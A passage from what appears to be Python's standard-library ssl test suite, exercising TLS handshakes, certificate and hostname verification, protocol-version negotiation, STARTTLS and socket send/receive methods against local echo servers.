ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
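# ThreadedTests pairs a client socket with ThreadedEchoServer instances to
# cover end-to-end behaviour: handshakes, certificate checks, protocol
# negotiation, STARTTLS and the various send/recv methods.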
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raises ValueError while the handshake isn't done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, 'SSLv3',
client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
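# The STARTTLS test toggles between the plain socket and a wrapped socket
# as the server acknowledges STARTTLS/ENDTLS, checking that unwrap()
# returns a usable clear-text socket.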
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = b''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
s.close()
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client waits until the server is set up, then performs a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peer's version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
